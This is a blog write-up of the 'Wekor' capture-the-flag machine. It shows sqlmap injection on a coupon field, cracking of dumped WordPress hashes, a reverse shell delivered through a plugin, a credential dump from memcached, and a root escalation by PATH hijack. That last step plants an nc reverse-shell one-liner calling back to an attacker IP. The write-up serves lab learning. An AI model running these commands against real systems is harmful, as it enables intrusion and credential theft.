CTF Wekor

CTF sqli
Created At :
Count:418 Views 👀 :
  1. rustscan
  2. robots.txt
  3. Gobuster
  4. SQL injection
    1. Wordpress
  5. Revershell
  6. Upgrade the shell
  7. Privesc
  8. Privesc to root
  9. Other solution for privesc.

rustscan

rustscan -a 10.10.140.46
language-bashCopy

Open 10.10.140.46:22
Open 10.10.140.46:80

robots.txt

User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting
language-noneCopy

http://10.10.140.46/comingreallysoon/

So we found this website.
http://10.10.140.46/it-next/

Gobuster

gobuster dir -u http://10.10.140.46/it-next/. -x txt,html,php -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
language-bashCopy

SQL injection

List of dbs

sqlmap -u  http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" --dbs
language-bashCopy

List of tables

sqlmap -u  http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress --tables
language-bashCopy

Dump the table wp_user

sqlmap -u  http://10.10.140.46/it-next/it_cart.php --data="coupon_code=ghjghj&apply_coupon=Apply+Coupon" -D wordpress -T wp_users -dump 
language-bashCopy

Let’s put thoses hashes into a file and crack them.

$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.
$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10
$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/
$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/
language-bashCopy
john hashs --wordlist=/home/peanutstick/Documents/arch_doc/CTF/Wordlist/rockyou.txt
language-bashCopy

Login with wp_yura:soccer13

Wordpress

http://site.wekor.thm/wordpress/
You need to add it to your /etc/hosts

Revershell

With the plugin.

Then eip it:

zip rev.zip revershell.php 
language-bashCopy

Upgrade the shell

python3 -c 'import pty;pty.spawn("/bin/bash")' 
export TERM=xterm # allow clear command
language-bashCopy

Then Ctrl + Z.

stty raw -echo; fg # allow auto completion
language-bashCopy

Privesc

there is the tool memcached-tool in /usr/share/memcached/scripts.
we can dump what’s runing on the port 11211.

/usr/share/memcached/scripts/memcached-tool localhost:11211 dump 
language-bashCopy

Output.

Dumping bucket 1 - 5 total items
add id 0 1676753794 4
3476
add username 0 1676753794 4
Orka
add salary 0 1676753794 8
$100,000
add password 0 1676753794 15
OrkAiSC00L24/7$
add email 0 1676753794 14
Orka@wekor.thm
language-textCopy

With the password OrkAiSC00L24/7$

Privesc to root

sudo -l
language-bashCopy

Let’s dig into this binary.

strings /home/Orka/Desktop/bitcoin
language-bashCopy

He use python.

Orka@osboxes:~$ ls /usr/sbin/python
ls: cannot access '/usr/sbin/python': No such file or directory
language-bashCopy

Let’s create it.

export PATH="/usr/sbin:$PATH"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.8.50.167 6666 >/tmp/f" > /usr/sbin/python
chmod +x /usr/sbin/python
sudo Desktop/bitcoin
language-bashCopy

I’m root.

Other solution for privesc.

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme